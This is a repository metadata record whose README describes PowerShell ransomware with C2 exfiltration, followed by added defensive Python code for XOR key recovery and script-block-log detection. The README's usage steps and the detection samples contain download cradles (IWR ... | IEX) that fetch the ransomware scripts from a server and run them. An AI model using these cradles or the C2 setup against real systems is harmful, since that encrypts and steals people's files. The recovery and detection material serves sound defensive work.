{"id":27629286,"url":"https://github.com/0x4f776c/powershell-ransomware","last_synced_at":"2025-04-23T15:16:01.577Z","repository":{"id":286877694,"uuid":"962833610","full_name":"0x4F776C/PowerShell-Ransomware","owner":"0x4F776C","description":"AES-256 and XOR-based PowerShell ransomware with customizability.","archived":false,"fork":false,"pushed_at":"2025-04-08T19:16:27.000Z","size":71182,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-23T15:15:57.951Z","etag":null,"topics":["command-and-control","powershell","ransomware"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x4F776C.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-04-08T18:36:47.000Z","updated_at":"2025-04-08T19:16:09.000Z","dependencies_parsed_at":"2025-04-08T20:36:50.366Z","dependency_job_id":null,"html_url":"https://github.com/0x4F776C/PowerShell-Ransomware","commit_stats":null,"previous_names":["0x4f776c/powershell-ransomware"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomwar
e/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x4F776C","download_url":"https://codeload.github.com/0x4F776C/PowerShell-Ransomware/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250457791,"owners_count":21433734,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-and-control","powershell","ransomware"],"created_at":"2025-04-23T15:16:00.837Z","updated_at":"2025-04-23T15:16:01.570Z","avatar_url":"https://github.com/0x4F776C.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003c!-- display-subdirectories: false --\u003e\n\n# PowerShell-Ransomware\n\nAES-256 and XOR-based PowerShell ransomware with customizability.\n\n## Purpose\nBoth **0xLock** and **Rox** are educational projects demonstrating file encryption with Command-and-Control (C2) server integration. They simulate ransomware-like behavior using AES and XOR encryption, including file exfiltration and C2 communication, for learning purposes only.\n\n⚠️ **Warning**: This project is for educational use only. The encryption methods (AES and XOR) are not secure for production due to simplified key management and inherent weaknesses (especially XOR). 
Not sure if my target audience cares...\n\n## Description\nThis repository contains:\n- **`heartbeat.ps1`**: A PowerShell script that encrypts files using AES-256, exfiltrates files (\u003c1GB) to a C2 server, and beacons back with results.\n- **`defender_update.ps1`**: A PowerShell script that encrypts files using XOR, exfiltrates files to a C2 server, and beacons back with results.\n- **`server.py`**: A Flask-based C2 server that handles payload delivery, file exfiltration, system info, file indexing, and beaconing.\n- **`clean_exfil.sh`**: A bash script to purge all contents of the `exfiltrated_files` and `exfiltrated_data` directories.\n\nFiles are encrypted in test directories (`C:\\Temp\\heartbeatDemo` for AES, `C:\\Temp\\roxDemo` for XOR) to avoid affecting real data.\n\n## Usage\n\n### Prerequisites\n- **PowerShell Scripts**: Windows with PowerShell 5.1+.\n- **Flask Server**: Python 3.6+, Flask (`pip install flask`), and network access (default: `10.0.0.128:80`).\n\n### Setup\n\n1. **Clone the Repository**:\n\n```bash\ngit clone https://github.com/0x4F776C/PowerShell-Ransomware.git\ncd PowerShell-Ransomware\n```\n\n2. **Run the Flask Server**:\n\n```bash\npip install flask\npython server.py\n```\n\n- If testing locally, update `$c2Server` in both scripts to `127.0.0.1:5000` and run the server with `app.run(host='0.0.0.0', port=5000, debug=True)`.\n\n3. 
**Run the PowerShell Scripts**:\n\n- For AES:\n\n```powershell\nIWR -Uri \"http://\u003cserver ip\u003e/files/heartbeat.ps1\" -UseBasicParsing | IEX\n```\n\n- For XOR:\n\n```powershell\nIWR -Uri \"http://\u003cserver ip\u003e/files/defender_update.ps1\" -UseBasicParsing | IEX\n```\n\n- Results: Encrypted files (`.0xlock` for AES, `.rox` for XOR), exfiltrated files in `exfiltrated_files/`, and a ransom note in the test directory.\n\n## Future Plans\n\n- Add more encryption methods (e.g., RSA for key exchange).\n- Improve key management for the AES script (e.g., secure key storage).\n- Enhance the C2 server with a web interface for monitoring.\n- Include more robust error handling and logging.\n- Add unit tests for both scripts and the server.\n\n## License\nThis project is licensed under the MIT License. See the file for details.\nHappy experimenting! 🚀","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x4f776c%2Fpowershell-ransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x4f776c%2Fpowershell-ransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x4f776c%2Fpowershell-ransomware/lists"}
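The README's warning calls the XOR variant insecure because of its "inherent weaknesses". The following added example (this editor's Python, not code from the PowerShell-Ransomware project or its author) shows the concrete consequence for a responder: with a repeating key, a single known file header gives back the key, and the key decrypts every file it touched. It assumes the XOR script repeats one short fixed key across each file, which the README does not state; the 16-byte key, the XML header used as known plaintext and the document body are constructed for the demonstration.

```python
"""Known-plaintext key recovery against repeating-key XOR.

Added example, not code from the PowerShell-Ransomware project. It assumes the
XOR script repeats a short fixed key across each file (the README does not
describe the keying); the key, the XML header and the document body below are
constructed for this demonstration.
"""
from itertools import cycle
from typing import Optional, Tuple


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Encrypting and decrypting are the same operation."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def guess_key_length(ciphertext: bytes, known_prefix: bytes, max_len: int = 64) -> Optional[int]:
    """Find the key period from a known plaintext prefix.

    ciphertext XOR plaintext reproduces the keystream byte for byte, so over the
    known prefix the keystream repeats with the key length. The prefix must
    cover at least two periods; otherwise None is returned rather than a guess.
    """
    n = len(known_prefix)
    keystream = xor_bytes(ciphertext[:n], known_prefix)
    for length in range(1, min(max_len, n // 2) + 1):
        if all(keystream[i] == keystream[i + length] for i in range(n - length)):
            return length
    return None


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> Optional[bytes]:
    """Return the key_len-byte key, or None if the prefix leaves key bytes unknown."""
    if len(known_prefix) < key_len:
        return None
    return xor_bytes(ciphertext[:key_len], known_prefix[:key_len])


def decrypt_with_known_header(ciphertext: bytes, known_prefix: bytes) -> Optional[Tuple[bytes, bytes]]:
    """Recover the key from a known file header and decrypt the whole file."""
    key_len = guess_key_length(ciphertext, known_prefix)
    if key_len is None:
        return None
    key = recover_key(ciphertext, known_prefix, key_len)
    if key is None:
        return None
    return key, xor_bytes(ciphertext, key)


# Constructed demo material: hypothetical key and file, not taken from the project.
DEMO_KEY = b"demo-key-0xROX!!"                                  # 16 bytes
XML_HEADER = b'<?xml version="1.0" encoding="UTF-8"?>\n'        # 39 bytes of predictable header
PLAINTEXT = XML_HEADER + b"<invoice><total>1250.00</total></invoice>\n"
CIPHERTEXT = xor_bytes(PLAINTEXT, DEMO_KEY)

if __name__ == "__main__":
    result = decrypt_with_known_header(CIPHERTEXT, XML_HEADER)
    assert result is not None
    key, recovered = result
    print("recovered key length:", len(key), "key:", key)
    print("plaintext restored:", recovered == PLAINTEXT)
```

Any file type with a fixed header (XML, PDF, Office containers) supplies the known plaintext, and the header only needs to span two key periods for the length to be unambiguous. Against the AES-256 variant this shortcut does not exist; recovery there depends entirely on how the key is generated, stored and sent to the C2, which is the key-management point the Future Plans list flags.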
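The launch lines in the Usage section (`IWR ... | IEX`) and the `.0xlock` / `.rox` extensions in the Results bullet are the two observable artifacts a defender can key on. The added example below (this editor's Python, not code from the project or its author) runs two detection rules over constructed PowerShell script-block-log records; it goes beyond the README by also matching the alias, nested and `DownloadString` spellings of the same download cradle. The event records, hostnames and field names are constructed to resemble Event ID 4104 entries, not real logs.

```python
"""Script-block-log detection for the download cradle and the ransom extensions.

Added example, not code from the PowerShell-Ransomware project. Event records
are constructed to resemble PowerShell ScriptBlockLogging (Event ID 4104)
entries; hostnames and field names are invented for the demonstration.
"""
import re
from typing import Dict, List, Tuple

DOWNLOAD = r"(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring)"
EXEC = r"(?:invoke-expression|iex)"

# Pipe form "IWR ... | IEX" (the README's launch line) and nested form "IEX (IWR ...)".
CRADLE_RE = re.compile(
    rf"{DOWNLOAD}\b[^|\n]*\|\s*{EXEC}\b|{EXEC}\b\s*\([^\n]*?{DOWNLOAD}\b",
    re.IGNORECASE,
)
# Extensions documented in the README; \b stops longer names such as ".roxy" from matching.
RANSOM_EXT_RE = re.compile(r"\.(?:0xlock|rox)\b", re.IGNORECASE)

RULES = [
    ("download_cradle", CRADLE_RE),
    ("ransom_extension", RANSOM_EXT_RE),
]


def classify(event: Dict[str, object]) -> List[str]:
    """Return the names of the rules a single script-block event triggers."""
    if event.get("event_id") != 4104:      # only script block text is inspected
        return []
    text = str(event.get("script", ""))
    return [name for name, rx in RULES if rx.search(text)]


def scan(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (host, rule) pairs for every rule hit, in event order."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        for rule in classify(ev):
            hits.append((str(ev["host"]), rule))
    return hits


# Constructed sample events. 10.0.0.128 is the README's default C2 address.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"event_id": 4104, "host": "WS01",
     "script": 'IWR -Uri "http://10.0.0.128/files/heartbeat.ps1" -UseBasicParsing | IEX'},
    {"event_id": 4104, "host": "WS02",
     "script": "iex (iwr 'http://10.0.0.128/files/defender_update.ps1' -UseBasicParsing)"},
    {"event_id": 4104, "host": "WS03",   # benign download to disk, no execution
     "script": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\Temp\\report.csv"},
    {"event_id": 4104, "host": "WS01",
     "script": "Rename-Item $f.FullName ($f.FullName + '.0xlock')"},
    {"event_id": 4104, "host": "WS03",   # README test directory, no ransom extension
     "script": "Set-Location C:\\Temp\\roxDemo"},
    {"event_id": 4104, "host": "WS05",
     "script": "IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.128/files/heartbeat.ps1'))"},
    {"event_id": 4103, "host": "WS04",   # pipeline event, not script block text: ignored
     "script": "Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Event ID 4104 only exists when PowerShell Script Block Logging is enabled, so the cradle rule is silent on hosts without it; the extension rule is the cheaper fallback because a rename to `.0xlock` or `.rox` also shows up in file-system telemetry.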